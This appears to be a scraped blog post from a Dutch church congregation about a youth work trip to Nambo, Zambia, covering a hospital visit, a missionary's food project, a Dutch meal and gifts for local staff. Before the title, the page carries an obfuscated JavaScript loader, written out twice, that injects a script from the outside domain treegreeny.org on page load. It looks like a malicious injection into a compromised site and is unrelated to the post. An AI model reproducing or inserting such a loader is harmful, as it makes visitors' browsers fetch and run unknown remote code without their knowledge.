;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ZA317 | Drukke dag in Zambia - PKN Damwâld

ZA317 | Drukke dag in Zambia

Gepubliceerd op: donderdag 17 augustus 2017

Ja hoor, hoofdleiders Jan en Alie weer in de World Servants-SMS-box. Het was een druk dagje in Nambo, lezen we.

Waar zullen we beginnen? Twee dames van de groep waren vandaag in het ziekenhuis. Niets bijzonders, zul je denken, want een uitstapje naar het ziekenhuis staat op de cultuurplanning van iedere groep. De meiden in Nambo maakten echter iets speciaals mee: ze mochten bij een bevalling aanwezig zijn! Hoe dat gegaan is vertelt Jan niet.

Een ander deel van de groep ging op bezoek bij Gerda den Ouden. Zij is een Nederlandse zendeling die sinds 2012 in Zambia woont. Vandaag liet ze de groep een voedselproject voor schoolkinderen zien.

Iets anders wat in het oog springt: het menu van vandaag. De groep at geen mais of rijst, maar aardappelpuree met rookworst en jus. Dat ging wel in de Friese (en verdwaalde Woerdense) magen. En als slagroom op de taart kreeg de groep een tompouche als toetje. Als dat geen feestje was…

Momenteel zijn de deelnemers alle cadeautjes voor de lokale staf aan het inpakken. Ze worden onder anderen verblijd met zeep, handdoeken, pepermunt en delfts blauw.

De groep heeft vast ook een goede bouw- en kinderwerkdag gehad, hoewel Jan dat niet vermeldt.

Een hartelijke groet van alle Namboërs!

Foto's